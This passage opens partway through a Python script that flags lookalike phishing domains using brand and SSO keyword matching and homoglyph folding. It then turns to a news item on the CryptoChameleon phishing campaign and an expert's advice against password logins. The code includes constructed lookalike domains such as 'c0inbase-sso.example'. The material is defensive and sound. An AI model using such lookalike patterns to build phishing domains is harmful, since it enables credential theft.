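    tokens = [t for label in domain.split(".")[:-1] for t in label.split("-") if t]
    brand_hits = [t for t in tokens if skeleton(t) in BRANDS]
    sso_hits = [t for t in tokens if skeleton(t) in SSO_KEYWORDS]
    reasons = set()
    if brand_hits and sso_hits:
        reasons.add("brand-sso-pattern")   # the companyname-okta style
    if any(t != skeleton(t) for t in brand_hits):
        reasons.add("homoglyph")           # brand only matches after folding
    return sorted(reasons)

# Constructed feed of new registrations (reserved .example names, not real IoCs).
FEED = ["fcc-okta.example", "c0inbase-sso.example", "c\u043einbase-login.example",
        "weather-news.example", "login.coinbase.com"]

def triage(feed):
    """Map each suspicious domain in the feed to its reasons."""
    return {d: r for d in feed if (r := classify(d))}

if __name__ == "__main__":
    for name, why in triage(FEED).items():
        print(ascii(name), why)
```

A production version would use the full Unicode confusables data and a public-suffix list instead of the last-label shortcut.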

CryptoChameleon is a unique phishing campaign that targets multiple devices, mimics genuine login pages, and uses advanced techniques like hCaptcha to bypass detection tools and enhance the legitimacy of their websites, making them difficult to distinguish from legitimate ones.

Researchers suggest users be cautious with unsolicited messages, verify the source of messages, and avoid sharing sensitive information online. Moreover, users must use strong, unique passwords, and stay informed on the latest phishing tactics and best practices for online security.

Expert Opinion

For insights, we reached out to Jason Soroko, Senior Vice President of Product at Sectigo, a Scottsdale, Arizona-based provider of comprehensive certificate lifecycle management (CLM), who stressed moving away from traditional username-and-password logins and training employees in cybersecurity and social engineering.

“Neither the usage of fake login screens nor lookalike domain names is novel, however, each of these techniques is effective in harvesting username and password credentials. What security teams should be doing is getting away from username and password authentication. If this isn’t possible, we have to go back to fundamental training in social engineering.”

“We have been taught not to open attachments in emails that have specific characteristics, however, people also need to be taught to scrutinize the domains of websites they are entering credentials into. Ideally, we must get away from weak forms of authentication that can be harvested this way,” Jason advised.
